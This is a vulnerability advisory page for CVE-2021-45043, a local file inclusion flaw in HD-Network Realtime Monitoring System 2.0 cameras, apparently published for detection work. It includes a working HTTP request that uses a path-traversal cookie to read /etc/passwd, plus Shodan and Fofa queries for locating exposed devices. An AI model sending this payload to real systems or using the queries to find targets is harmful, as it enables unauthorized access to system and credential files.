🔙 목록으로 돌아가기

CVE-2021-45043: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion

TitleHD-Network Realtime Monitoring System 2.0 - Local File Inclusion
AuthorMomen Eldawakhly,Evan Rubinstein
SeverityHigh
ImpactAn attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
RemediationApply the latest patch or update provided by the vendor to fix the LFI vulnerability in HD-Network Realtime Monitoring System 2.0.
CVSS Score7.5
EPSS Score0.82486
CVE IDCVE-2021-45043
CWE IDCWE-22
Shodan Queryhttp.title:"hd-network real-time monitoring system v2.0"
Fofa Querytitle="hd-network real-time monitoring system v2.0"
Tags cve2021 cve camera edb hdnetwork lfi iot hd-network_real-time_monitoring_system_project vuln

🔍 Vulnerability Description

Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.

🌐 HTTP Request

GET /language/lang HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.1
Connection: close
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
Referer: http://www.victim.com
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-45043.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-45043.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A